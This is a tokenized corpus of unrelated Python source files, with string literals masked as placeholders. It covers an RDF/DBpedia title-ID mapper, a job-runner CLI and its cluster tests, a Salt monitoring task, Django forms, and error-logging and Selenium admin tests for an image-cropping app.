<s> import codecs <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import bz2file <EOL> import gzip <EOL> import RDF <EOL> from utils . logger import get_logger <EOL> DBPEDIA_RES_URI = "<STR_LIT>" <EOL> logger = get_logger ( ) <EOL> def open_file ( file_path ) : <EOL> """<STR_LIT>""" <EOL> open_fn = codecs . open <EOL> if file_path . endswith ( "<STR_LIT>" ) : <EOL> open_fn = bz2file . open <EOL> elif file_path . endswith ( "<STR_LIT>" ) : <EOL> open_fn = gzip . open <EOL> return open_fn <EOL> def get_rdf_parser ( file_path ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" in file_path : <EOL> return RDF . TurtleParser ( ) <EOL> elif "<STR_LIT>" in file_path : <EOL> return RDF . NTriplesParser ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" , file_path ) <EOL> def iterate_rdf_triples ( file_path ) : <EOL> """<STR_LIT>""" <EOL> open_fn = open_file ( file_path ) <EOL> rdf_parser = get_rdf_parser ( file_path ) <EOL> with open_fn ( file_path , "<STR_LIT:r>" ) as in_file : <EOL> for rdf_line in in_file : <EOL> rdf_stream = rdf_parser . parse_string_as_stream ( rdf_line , "<STR_LIT:.>" ) <EOL> for statement in rdf_stream : <EOL> yield statement . subject , statement . predicate , statement . object <EOL> def tuple_generator ( file_path , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> rdf_tuple_iterator = iterate_rdf_triples ( file_path ) <EOL> counter = <NUM_LIT:0> <EOL> for subj , _ , obj in rdf_tuple_iterator : <EOL> subj = unicode ( subj ) <EOL> obj = unicode ( obj ) <EOL> if prefix : <EOL> subj = subj . replace ( prefix , "<STR_LIT>" ) <EOL> obj = obj . replace ( prefix , "<STR_LIT>" ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" , counter ) <EOL> yield subj , obj <EOL> def generate_subject_object_map ( file_path , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> subj_obj_generator = tuple_generator ( file_path , prefix ) <EOL> return dict ( subj_obj_generator ) <EOL> def generate_title_id_map ( redirects_file_path , title_ids_file_path , output_file_path = None ) : <EOL> """<STR_LIT>""" <EOL> resolved_title_id_map = dict ( ) <EOL> redirects_map = generate_subject_object_map ( redirects_file_path , DBPEDIA_RES_URI ) <EOL> title_ids_map = generate_subject_object_map ( title_ids_file_path , DBPEDIA_RES_URI ) <EOL> counter = <NUM_LIT:0> <EOL> for title , page_id in title_ids_map . items ( ) : <EOL> title = redirects_map . get ( title , title ) <EOL> if title in title_ids_map : <EOL> page_id = title_ids_map [ title ] <EOL> else : <EOL> logger . warning ( "<STR_LIT>" , page_id ) <EOL> if title not in resolved_title_id_map : <EOL> resolved_title_id_map [ title ] = page_id <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , title ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" , counter ) <EOL> if output_file_path : <EOL> logger . info ( "<STR_LIT>" , output_file_path ) <EOL> with codecs . open ( output_file_path , "<STR_LIT:w>" ) as out_file : <EOL> pickle . dump ( resolved_title_id_map , out_file , pickle . HIGHEST_PROTOCOL ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return resolved_title_id_map </s>
<s> """<STR_LIT>""" <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = __doc__ , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from . import parse_args , dry , colorize , YELLOW , GREEN , RED , BLUE <EOL> import jip <EOL> import jip . jobs <EOL> from jip . logger import getLogger <EOL> from datetime import datetime , timedelta <EOL> log = getLogger ( '<STR_LIT>' ) <EOL> def main ( argv = None ) : <EOL> args = parse_args ( __doc__ , argv = argv ) <EOL> script_file = args [ "<STR_LIT>" ] <EOL> script_args = args [ "<STR_LIT>" ] <EOL> try : <EOL> script = jip . find ( script_file , is_pipeline = args [ '<STR_LIT>' ] ) <EOL> except LookupError , e : <EOL> print >> sys . stderr , str ( e ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args [ '<STR_LIT>' ] or args [ '<STR_LIT>' ] : <EOL> dry ( script , script_args , dry = args [ '<STR_LIT>' ] , show = args [ '<STR_LIT>' ] ) <EOL> return <EOL> keep = args [ '<STR_LIT>' ] <EOL> force = args [ '<STR_LIT>' ] <EOL> profiler = args [ '<STR_LIT>' ] <EOL> silent = not args [ '<STR_LIT>' ] <EOL> try : <EOL> profile = jip . profiles . Profile ( ) <EOL> if args [ '<STR_LIT>' ] : <EOL> spec_prof = jip . profiles . Profile . from_file ( args [ '<STR_LIT>' ] ) <EOL> spec_prof . update ( profile ) <EOL> profile = spec_prof <EOL> profile . load_args ( args ) <EOL> jobs = jip . jobs . create_jobs ( script , args = script_args , keep = keep , <EOL> profile = profile ) <EOL> for i , j in enumerate ( jobs ) : <EOL> j . id = i + <NUM_LIT:1> <EOL> for exe in jip . jobs . create_executions ( jobs ) : <EOL> if exe . completed and not force : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( "<STR_LIT>" , YELLOW ) , exe . name <EOL> else : <EOL> if not silent : <EOL> sys . stderr . write ( colorize ( "<STR_LIT>" , YELLOW ) + <EOL> "<STR_LIT>" . format ( <EOL> name = colorize ( exe . name , BLUE ) <EOL> ) ) <EOL> sys . stderr . flush ( ) <EOL> start = datetime . now ( ) <EOL> success = jip . jobs . run_job ( exe . job , profiler = profiler ) <EOL> end = timedelta ( seconds = ( datetime . now ( ) - start ) . seconds ) <EOL> if success : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( exe . job . state , GREEN ) , "<STR_LIT>" % ( end ) <EOL> else : <EOL> if not silent : <EOL> print >> sys . stderr , colorize ( exe . job . state , RED ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except jip . ValidationError as va : <EOL> sys . stderr . write ( str ( va ) ) <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except jip . ParserException as va : <EOL> sys . stderr . write ( str ( va ) ) <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception as va : <EOL> raise <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from collections import namedtuple <EOL> import pytest <EOL> import os <EOL> import stat <EOL> import tempfile <EOL> import jip <EOL> import jip . cluster as cl <EOL> listOfBinaries = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def createFakeBinaries ( ) : <EOL> fakeBinDir = tempfile . mkdtemp ( ) <EOL> paths = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> paths . append ( fakeBinDir ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT::>' . join ( paths ) <EOL> for f in [ os . path . join ( fakeBinDir , f ) for f in listOfBinaries ] : <EOL> open ( f , '<STR_LIT:w>' ) . close ( ) <EOL> os . chmod ( f , stat . S_IRWXU ) <EOL> return fakeBinDir <EOL> def removeFakeBinaries ( fakeBinDir ) : <EOL> for f in [ os . path . join ( fakeBinDir , f ) for f in listOfBinaries ] : <EOL> os . unlink ( f ) <EOL> os . rmdir ( fakeBinDir ) <EOL> paths = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> paths . remove ( fakeBinDir ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT::>' . join ( paths ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT:name>" , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_loading_internal_implementations_with_no_bins ( name ) : <EOL> original_path = os . environ [ '<STR_LIT>' ] <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with pytest . raises ( cl . ExecutableNotFoundError ) : <EOL> cl . get ( name ) <EOL> os . environ [ '<STR_LIT>' ] = original_path <EOL> cl . _cluster_cache = { } <EOL> @ pytest . mark . parametrize ( "<STR_LIT:name>" , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_loading_internal_implementations ( name ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> assert cl . get ( name ) is not None <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_cluster_not_found ( ) : <EOL> with pytest . raises ( cl . ClusterImplementationError ) : <EOL> cl . get ( '<STR_LIT>' ) <EOL> def test_cluster_name_none ( ) : <EOL> jip . config . config [ '<STR_LIT>' ] = None <EOL> with pytest . raises ( cl . ClusterImplementationError ) : <EOL> cl . get ( None ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_resolving_log_file_names ( name , term ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> Job = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> j = Job ( <NUM_LIT:1> ) <EOL> cluster = cl . get ( name ) <EOL> assert cluster . resolve_log ( j , "<STR_LIT>" % term ) == "<STR_LIT>" <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_sge_threads_pe_loading ( ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> jip . config . config [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : '<STR_LIT>' <EOL> } <EOL> sge = cl . SGE ( ) <EOL> assert sge . threads_pe == '<STR_LIT>' <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:k>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:M>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:m>' , '<STR_LIT>' ) <EOL> ] ) <EOL> def test_sge_mem_unit_loading ( unit , op ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> mem = <NUM_LIT> <EOL> jip . config . config [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : unit <EOL> } <EOL> sge = cl . SGE ( ) <EOL> assert sge . mem_unit == unit . upper ( ) <EOL> assert sge . _sge_mem ( mem ) == ( '<STR_LIT>' % ( eval ( "<STR_LIT>" % ( mem , op ) ) , unit . upper ( ) ) ) <EOL> removeFakeBinaries ( fakeBinDir ) <EOL> def test_sge_mem_unit_default ( ) : <EOL> fakeBinDir = createFakeBinaries ( ) <EOL> mem = <NUM_LIT> <EOL> sge = cl . SGE ( ) <EOL> assert sge . mem_unit == '<STR_LIT:M>' <EOL> assert sge . _sge_mem ( mem ) == '<STR_LIT>' <EOL> removeFakeBinaries ( fakeBinDir ) </s>
<s> import datetime <EOL> import time <EOL> import salt . log <EOL> log = salt . log . getLogger ( __name__ ) <EOL> class MonitorTask ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , taskid , pyexe , context , scheduler = None ) : <EOL> self . taskid = taskid <EOL> self . code = pyexe <EOL> self . context = context <EOL> self . scheduler = scheduler <EOL> def run ( self ) : <EOL> log . trace ( '<STR_LIT>' , self . taskid ) <EOL> minion = self . context . get ( '<STR_LIT:id>' ) <EOL> collector = self . context . get ( '<STR_LIT>' ) <EOL> while True : <EOL> try : <EOL> exec self . code in self . context <EOL> except Exception , ex : <EOL> log . error ( "<STR_LIT>" , self . taskid , ex , exc_info = ex ) <EOL> if collector : <EOL> jid = datetime . datetime . strftime ( <EOL> datetime . datetime . now ( ) , '<STR_LIT>' ) <EOL> try : <EOL> collector ( minion , self . context [ '<STR_LIT>' ] , self . context [ '<STR_LIT:result>' ] ) <EOL> except Exception , ex : <EOL> log . error ( '<STR_LIT>' , self . taskid , exc_info = ex ) <EOL> if self . scheduler is None : <EOL> break <EOL> duration = self . scheduler . next ( ) <EOL> log . trace ( '<STR_LIT>' , self . taskid , duration ) <EOL> time . sleep ( duration ) <EOL> log . debug ( '<STR_LIT>' , self . taskid ) </s>
<s> from django . forms import Form , CharField , PasswordInput , ModelChoiceField <EOL> from django . contrib . auth . models import User <EOL> from django . forms import ModelForm <EOL> from contest import models <EOL> class RegistrationForm ( Form ) : <EOL> username = CharField ( label = '<STR_LIT>' , max_length = <NUM_LIT:50> ) <EOL> password = CharField ( widget = PasswordInput ) <EOL> def is_valid ( self ) : <EOL> valid = super ( Form , self ) . is_valid ( ) <EOL> if not valid : <EOL> return valid <EOL> uname = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> users = User . objects . filter ( username = uname ) . count ( ) <EOL> if users > <NUM_LIT:0> : <EOL> self . _errors [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return False <EOL> else : <EOL> return True <EOL> class AttemptForm ( ModelForm ) : <EOL> class Meta : <EOL> model = models . Attempt <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ProfileForm ( ModelForm ) : <EOL> class Meta : <EOL> model = models . Profile <EOL> exclude = [ '<STR_LIT:user>' , '<STR_LIT>' ] </s>
<s> from lib import automata <EOL> import matplotlib . pyplot as plt <EOL> plt . ion ( ) <EOL> import numpy as np <EOL> import time <EOL> m , n = <NUM_LIT:100> , <NUM_LIT:100> <EOL> rule_string = '<STR_LIT>' <EOL> A = <NUM_LIT> * np . random . random ( m * n ) . reshape ( ( m , n ) ) <EOL> A = A . round ( ) <EOL> plt . figure ( ) <EOL> img_plot = plt . imshow ( A , interpolation = "<STR_LIT>" , cmap = plt . cm . gray ) <EOL> plt . show ( ) <EOL> while True : <EOL> A = automata ( A , rule_string ) <EOL> img_plot . set_data ( A ) <EOL> plt . draw ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> import six <EOL> from six . moves import xrange <EOL> import os <EOL> import sys <EOL> import logging <EOL> import copy <EOL> import errno <EOL> from django . core . urlresolvers import get_urlconf , get_resolver <EOL> from django . http import HttpResponse <EOL> from django . utils . safestring import mark_safe <EOL> try : <EOL> from django . utils . encoding import force_unicode <EOL> except ImportError : <EOL> from django . utils . encoding import force_text as force_unicode <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> SentryHandler = raven_client = None <EOL> try : <EOL> from sentry . client . handlers import SentryHandler <EOL> except ImportError : <EOL> try : <EOL> from raven . contrib . django . models import get_client <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> raven_client = get_client ( ) <EOL> if SentryHandler : <EOL> logger . addHandler ( SentryHandler ( ) ) <EOL> class FauxTb ( object ) : <EOL> def __init__ ( self , tb_frame , tb_lineno , tb_next ) : <EOL> self . tb_frame = tb_frame <EOL> self . tb_lineno = tb_lineno <EOL> self . tb_next = tb_next <EOL> def current_stack ( skip = <NUM_LIT:0> ) : <EOL> try : <EOL> <NUM_LIT:1> / <NUM_LIT:0> <EOL> except ZeroDivisionError : <EOL> f = sys . exc_info ( ) [ <NUM_LIT:2> ] . tb_frame <EOL> for i in xrange ( skip + <NUM_LIT:2> ) : <EOL> f = f . f_back <EOL> lst = [ ] <EOL> while f is not None : <EOL> lst . append ( ( f , f . f_lineno ) ) <EOL> f = f . f_back <EOL> return lst <EOL> def extend_traceback ( tb , stack ) : <EOL> """<STR_LIT>""" <EOL> head = tb <EOL> for tb_frame , tb_lineno in stack : <EOL> head = FauxTb ( tb_frame , tb_lineno , head ) <EOL> return head <EOL> def full_exc_info ( ) : <EOL> """<STR_LIT>""" <EOL> t , v , tb = sys . exc_info ( ) <EOL> full_tb = extend_traceback ( tb , current_stack ( <NUM_LIT:1> ) ) <EOL> return t , v , full_tb <EOL> def format_error ( error ) : <EOL> from generic_plus . utils import get_relative_media_url <EOL> if isinstance ( error , six . string_types ) : <EOL> return error <EOL> elif isinstance ( error , IOError ) : <EOL> if error . errno == errno . ENOENT : <EOL> file_name = get_relative_media_url ( error . filename ) <EOL> return u"<STR_LIT>" % file_name <EOL> return u"<STR_LIT>" % { <EOL> '<STR_LIT:type>' : error . __class__ . __name__ , <EOL> '<STR_LIT>' : error , <EOL> } <EOL> def log_error ( request , view , action , errors , exc_info = None ) : <EOL> error_msg = "<STR_LIT>" % ( action , format_error ( errors [ <NUM_LIT:0> ] ) ) <EOL> log_kwargs = { } <EOL> if not exc_info : <EOL> try : <EOL> exc_info = full_exc_info ( ) <EOL> except : <EOL> exc_info = None <EOL> if exc_info and not isinstance ( exc_info , tuple ) or not len ( exc_info ) or not exc_info [ <NUM_LIT:0> ] : <EOL> exc_info = None <EOL> if exc_info : <EOL> log_kwargs [ "<STR_LIT>" ] = exc_info <EOL> extra_data = { <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT>' : os . getpid ( ) <EOL> } <EOL> try : <EOL> import psutil , math , time , thread <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> p = psutil . Process ( os . getpid ( ) ) <EOL> proc_timestamp = time . strftime ( "<STR_LIT>" , time . localtime ( p . create_time ) ) <EOL> try : <EOL> create_usec = six . text_type ( p . create_time - math . floor ( p . create_time ) ) [ <NUM_LIT:1> : <NUM_LIT:5> ] <EOL> except : <EOL> create_usec = '<STR_LIT>' <EOL> proc_timestamp += create_usec <EOL> extra_data [ '<STR_LIT>' ] = proc_timestamp <EOL> extra_data [ '<STR_LIT>' ] = thread . get_ident ( ) <EOL> if isinstance ( errors [ <NUM_LIT:0> ] , CropDusterUrlException ) : <EOL> urlconf = get_urlconf ( ) <EOL> resolver = get_resolver ( urlconf ) <EOL> extra_data [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : resolver . regex , <EOL> "<STR_LIT>" : resolver . urlconf_name , <EOL> "<STR_LIT>" : resolver . default_kwargs , <EOL> "<STR_LIT>" : resolver . namespace , <EOL> "<STR_LIT>" : resolver . urlconf_module <EOL> } <EOL> resolver_reverse_dict = dict ( <EOL> [ ( force_unicode ( k ) , resolver . reverse_dict [ k ] ) for k in resolver . reverse_dict ] ) <EOL> resolver_namespace_dict = dict ( <EOL> [ ( force_unicode ( k ) , resolver . namespace_dict [ k ] ) for k in resolver . namespace_dict ] ) <EOL> extra_data . update ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : resolver . regex , <EOL> "<STR_LIT>" : resolver . urlconf_name , <EOL> "<STR_LIT>" : resolver . default_kwargs , <EOL> "<STR_LIT>" : resolver . namespace , <EOL> "<STR_LIT>" : resolver . urlconf_module <EOL> } , <EOL> '<STR_LIT>' : resolver_reverse_dict , <EOL> '<STR_LIT>' : resolver_namespace_dict , <EOL> '<STR_LIT>' : resolver . app_dict , <EOL> '<STR_LIT>' : resolver . url_patterns , <EOL> '<STR_LIT>' : urlconf , <EOL> '<STR_LIT>' : '<STR_LIT>' % view , <EOL> } ) <EOL> raven_kwargs = { '<STR_LIT>' : request , '<STR_LIT>' : extra_data , '<STR_LIT:data>' : { '<STR_LIT:message>' : error_msg } } <EOL> if raven_client : <EOL> if exc_info : <EOL> return raven_client . get_ident ( <EOL> raven_client . captureException ( exc_info = exc_info , ** raven_kwargs ) ) <EOL> else : <EOL> return raven_client . get_ident ( <EOL> raven_client . captureMessage ( error_msg , ** raven_kwargs ) ) <EOL> else : <EOL> extra_data . update ( { <EOL> '<STR_LIT>' : request , <EOL> '<STR_LIT:url>' : request . path_info , <EOL> } ) <EOL> logger . error ( error_msg , extra = extra_data , ** log_kwargs ) <EOL> return None <EOL> def json_error ( request , view , action , errors = None , forms = None , formsets = None , log = False , exc_info = None ) : <EOL> from . utils import json <EOL> if forms : <EOL> formset_errors = [ [ copy . deepcopy ( f . errors ) for f in forms ] ] <EOL> elif formsets : <EOL> formset_errors = [ copy . deepcopy ( f . errors ) for f in formsets ] <EOL> else : <EOL> formset_errors = [ ] <EOL> if not errors and not formset_errors : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> error_str = u'<STR_LIT>' <EOL> for forms in formset_errors : <EOL> for form_errors in forms : <EOL> for k in sorted ( form_errors . keys ( ) ) : <EOL> v = form_errors . pop ( k ) <EOL> k = mark_safe ( '<STR_LIT>' % { '<STR_LIT:k>' : k } ) <EOL> form_errors [ k ] = v <EOL> error_str += force_unicode ( form_errors ) <EOL> errors = errors or [ error_str ] <EOL> if log : <EOL> log_error ( request , view , action , errors , exc_info = exc_info ) <EOL> if len ( errors ) == <NUM_LIT:1> : <EOL> error_msg = "<STR_LIT>" % ( action , format_error ( errors [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> error_msg = "<STR_LIT>" % action <EOL> error_msg += "<STR_LIT>" <EOL> for error in errors : <EOL> error_msg += "<STR_LIT>" % format_error ( error ) <EOL> error_msg += "<STR_LIT>" <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:error>' : error_msg } ) , content_type = '<STR_LIT:application/json>' ) <EOL> class CropDusterException ( Exception ) : <EOL> pass <EOL> class CropDusterUrlException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterViewException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterModelException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterImageException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterFileException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterResizeException ( CropDusterException ) : <EOL> pass </s>
<s> import os <EOL> import contextlib <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . admin . tests import AdminSeleniumWebDriverTestCase <EOL> from django . core . urlresolvers import reverse <EOL> from django . test . utils import override_settings <EOL> from selenium . webdriver . common . by import By <EOL> from selenium . webdriver . support . expected_conditions import ( <EOL> visibility_of_element_located , element_to_be_clickable ) <EOL> try : <EOL> import grappelli <EOL> except ImportError : <EOL> grappelli = None <EOL> from . helpers import CropdusterTestCaseMediaMixin <EOL> from . models import Article , Author , TestForOptionalSizes , TestForOrphanedThumbs <EOL> from . . models import Size , Thumb <EOL> @ override_settings ( ROOT_URLCONF = '<STR_LIT>' ) <EOL> class TestAdmin ( CropdusterTestCaseMediaMixin , AdminSeleniumWebDriverTestCase ) : <EOL> available_apps = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if grappelli : <EOL> available_apps . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> webdriver_class = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> super ( TestAdmin , self ) . setUp ( ) <EOL> self . selenium . set_window_size ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . selenium . set_page_load_timeout ( <NUM_LIT:10> ) <EOL> User . objects . create_superuser ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def wait_until_visible_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> visibility_of_element_located ( ( By . CSS_SELECTOR , selector ) ) , <EOL> timeout = timeout ) <EOL> def wait_until_clickable_xpath ( self , xpath , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> element_to_be_clickable ( ( By . XPATH , xpath ) ) , timeout = timeout ) <EOL> def wait_until_clickable_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> element_to_be_clickable ( ( By . CSS_SELECTOR , selector ) ) , <EOL> timeout = timeout ) <EOL> @ contextlib . contextmanager <EOL> def visible_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_visible_selector ( selector , timeout ) <EOL> yield self . selenium . find_element_by_css_selector ( selector ) <EOL> @ contextlib . contextmanager <EOL> def clickable_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_clickable_selector ( selector , timeout ) <EOL> yield self . selenium . find_element_by_css_selector ( selector ) <EOL> @ contextlib . contextmanager <EOL> def clickable_xpath ( self , xpath , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_clickable_xpath ( xpath , timeout ) <EOL> yield self . selenium . find_element_by_xpath ( xpath ) <EOL> @ contextlib . contextmanager <EOL> def switch_to_popup_window ( self ) : <EOL> self . wait_until ( lambda d : len ( d . window_handles ) == <NUM_LIT:2> ) <EOL> self . selenium . switch_to . window ( self . selenium . window_handles [ <NUM_LIT:1> ] ) <EOL> yield <EOL> self . wait_until ( lambda d : len ( d . window_handles ) == <NUM_LIT:1> ) <EOL> self . selenium . switch_to . window ( self . selenium . window_handles [ <NUM_LIT:0> ] ) <EOL> def test_addform_single_image ( self ) : <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = reverse ( '<STR_LIT>' ) ) <EOL> browser = self . selenium <EOL> browser . find_element_by_id ( '<STR_LIT>' ) . send_keys ( '<STR_LIT>' ) <EOL> browser . find_element_by_css_selector ( '<STR_LIT>' ) . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_xpath ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> sizes = list ( Size . flatten ( Author . HEADSHOT_SIZES ) ) <EOL> self . assertTrue ( bool ( author . headshot . path ) ) <EOL> image = author . headshot . related_object <EOL> thumbs = image . thumbs . all ( ) <EOL> self . assertEqual ( len ( thumbs ) , len ( sizes ) ) <EOL> main_thumb = image . thumbs . get ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( main_thumb . to_dict ( ) , { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:width>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : image . pk , <EOL> '<STR_LIT:id>' : main_thumb . pk , <EOL> } ) <EOL> auto_thumb = image . thumbs . get ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( auto_thumb . to_dict ( ) , { <EOL> '<STR_LIT>' : main_thumb . pk , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:width>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : image . pk , <EOL> '<STR_LIT:id>' : auto_thumb . pk , <EOL> } ) <EOL> def test_addform_multiple_image ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = reverse ( '<STR_LIT>' ) ) <EOL> browser = self . selenium <EOL> browser . find_element_by_id ( '<STR_LIT>' ) . send_keys ( "<STR_LIT>" ) <EOL> browser . find_element_by_css_selector ( '<STR_LIT>' ) . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> browser . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) 